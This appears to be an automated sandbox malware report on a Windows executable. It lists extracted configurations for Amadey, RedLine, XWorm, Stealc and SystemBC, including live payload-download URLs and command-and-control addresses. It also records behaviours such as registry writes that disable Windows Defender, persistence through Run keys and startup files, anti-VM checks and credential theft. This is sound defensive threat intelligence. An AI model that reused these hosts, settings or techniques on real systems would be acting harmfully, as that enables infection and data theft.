Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
19-02-2025 02:49
Static task
static1
Behavioral task
behavioral1
Sample
22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe
Resource
win10v2004-20250217-en
General
-
Target
22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe
-
Size
2.0MB
-
MD5
da013399e13811ab7a5f1ea197773829
-
SHA1
91ad2313b83426686c4594c02ccbe97b92e714fe
-
SHA256
22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0
-
SHA512
f84c24a857a6a874e25d132ffebdd22443e8149424f961ea604812f7004a63705e970c4c22cb488baa5bd47b34215142a36eef47159129dcaf66a0de219c55fd
-
SSDEEP
49152:5ojBIGhDjjr6UQd0/yfSdKjA6jbDWl2HLWfxan5ejm:OGGhK9daKA6jTrWE5W
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
redline
cheat
103.84.89.222:33791
Extracted
xworm
5.0
45.154.98.175:7000
0HzpJoisb4u9PgIO
-
Install_directory
%AppData%
-
install_file
google_updates.exe
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Signatures
-
Amadey family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0009000000023d49-857.dat family_xworm behavioral2/memory/4400-873-0x0000000000730000-0x0000000000740000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/5764-1009-0x0000000000BD0000-0x0000000001044000-memory.dmp healer behavioral2/memory/5764-1011-0x0000000000BD0000-0x0000000001044000-memory.dmp healer behavioral2/memory/5764-1151-0x0000000000BD0000-0x0000000001044000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral2/memory/3516-208-0x0000000000FC0000-0x0000000001438000-memory.dmp family_sectoprat behavioral2/memory/3516-209-0x0000000000FC0000-0x0000000001438000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Systembc family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ViGgA8C.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ sHN20me.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ m5UP2Yj.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dxtou.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Fe36XBk.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ spoDnGT.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE -
Blocklisted process makes network request 64 IoCs
flow pid Process 75 2476 powershell.exe 78 2476 powershell.exe 88 2476 powershell.exe 93 2476 powershell.exe 96 2476 powershell.exe 102 2476 powershell.exe 105 2476 powershell.exe 108 2476 powershell.exe 111 2476 powershell.exe 112 2476 powershell.exe 113 2476 powershell.exe 114 2476 powershell.exe 120 2476 powershell.exe 123 2476 powershell.exe 124 2476 powershell.exe 125 2476 powershell.exe 126 2476 powershell.exe 127 2476 powershell.exe 128 2476 powershell.exe 129 2476 powershell.exe 130 2476 powershell.exe 133 2476 powershell.exe 139 2476 powershell.exe 140 2476 powershell.exe 141 2476 powershell.exe 142 2476 powershell.exe 143 2476 powershell.exe 145 2476 powershell.exe 146 2476 powershell.exe 162 2476 powershell.exe 163 2476 powershell.exe 170 2476 powershell.exe 173 2476 powershell.exe 177 2476 powershell.exe 179 2476 powershell.exe 180 2476 powershell.exe 186 2476 powershell.exe 189 2476 powershell.exe 192 2476 powershell.exe 196 2476 powershell.exe 197 2476 powershell.exe 198 2476 powershell.exe 199 2476 powershell.exe 201 2476 powershell.exe 202 2476 powershell.exe 204 2476 powershell.exe 206 2476 powershell.exe 207 2476 powershell.exe 208 2476 powershell.exe 209 2476 powershell.exe 210 2476 powershell.exe 214 2476 powershell.exe 216 2476 powershell.exe 220 2476 powershell.exe 221 2476 powershell.exe 223 2476 powershell.exe 224 2476 powershell.exe 225 2476 powershell.exe 227 2476 powershell.exe 228 2476 powershell.exe 230 2476 powershell.exe 240 2476 powershell.exe 242 2476 powershell.exe 246 2476 powershell.exe -
pid Process 232 powershell.exe 4928 powershell.exe 5916 powershell.exe 6124 powershell.exe 5988 powershell.exe 4488 powershell.exe 5260 powershell.exe -
Downloads MZ/PE file 22 IoCs
flow pid Process 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 18 4884 skotes.exe 282 4884 skotes.exe 293 5260 powershell.exe 326 5988 powershell.exe -
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3264 msedge.exe 3404 chrome.exe 4020 chrome.exe 2232 msedge.exe 1592 msedge.exe 5136 msedge.exe 2028 chrome.exe 1036 chrome.exe 1932 msedge.exe -
Checks BIOS information in registry 2 TTPs 28 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dxtou.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Fe36XBk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ViGgA8C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion spoDnGT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ViGgA8C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dxtou.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Fe36XBk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sHN20me.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sHN20me.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion spoDnGT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation 7aencsM.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation 22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation skotes.exe -
Drops startup file 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe -
Executes dropped EXE 31 IoCs
pid Process 4884 skotes.exe 4240 8c12de9356.exe 1392 8c12de9356.exe 3448 skotes.exe 4452 13Z5sqy.exe 1964 jonbDes.exe 4300 Bjkm5hE.exe 4344 Bjkm5hE.exe 2044 Fe36XBk.exe 3516 ViGgA8C.exe 2180 DTQCxXZ.exe 2136 TaVOM7x.exe 4564 d2YQIJa.exe 3352 sHN20me.exe 3736 spoDnGT.exe 4400 Ta3ZyUR.exe 2216 Ta3ZyUR.exe 1084 Ta3ZyUR.exe 2980 qFqSpAp.exe 5048 skotes.exe 4584 m5UP2Yj.exe 4392 7aencsM.exe 5032 7aencsM.exe 4400 C3hYpvm.exe 3856 oVpNTUm.exe 3012 48ea1929e8.exe 5764 TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE 5256 dbb289c57d.exe 5920 dxtou.exe 5760 483d2fa8a0d53818306efeb32d3.exe 4104 ce1f526a85.exe -
Identifies Wine through registry keys 2 TTPs 14 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine ViGgA8C.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine sHN20me.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine spoDnGT.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine m5UP2Yj.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine oVpNTUm.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine 22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine Fe36XBk.exe Key opened \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine dxtou.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C3hYpvm.exe Set value (str) \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\48ea1929e8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086592101\\48ea1929e8.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086593021\\am_no.cmd" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 Fe36XBk.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023d57-949.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
pid Process 3880 22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe 4884 skotes.exe 3448 skotes.exe 2044 Fe36XBk.exe 3516 ViGgA8C.exe 4564 d2YQIJa.exe 3352 sHN20me.exe 3736 spoDnGT.exe 5048 skotes.exe 4584 m5UP2Yj.exe 3856 oVpNTUm.exe 5764 TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE 5920 dxtou.exe 5760 483d2fa8a0d53818306efeb32d3.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 4240 set thread context of 1392 4240 8c12de9356.exe 89 PID 4300 set thread context of 4344 4300 Bjkm5hE.exe 100 PID 4452 set thread context of 2904 4452 13Z5sqy.exe 116 PID 4400 set thread context of 1084 4400 Ta3ZyUR.exe 121 PID 4392 set thread context of 5032 4392 7aencsM.exe 129 PID 2136 set thread context of 4448 2136 TaVOM7x.exe 127 -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Tasks\dxtou.job oVpNTUm.exe File created C:\Windows\Tasks\skotes.job 22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe File created C:\Windows\Tasks\dxtou.job oVpNTUm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
pid pid_target Process procid_target 2716 4240 WerFault.exe 87 3668 4300 WerFault.exe 99 1680 4400 WerFault.exe 119 1564 4392 WerFault.exe 128 5112 4584 WerFault.exe 126 -
System Location Discovery: System Language Discovery 1 TTPs 53 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8c12de9356.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8c12de9356.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fe36XBk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dbb289c57d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ce1f526a85.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TaVOM7x.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qFqSpAp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jonbDes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oVpNTUm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ViGgA8C.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m5UP2Yj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 13Z5sqy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spoDnGT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 48ea1929e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sHN20me.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dxtou.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString m5UP2Yj.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 5212 timeout.exe 5672 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133844070762629094" chrome.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5200 schtasks.exe 5352 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
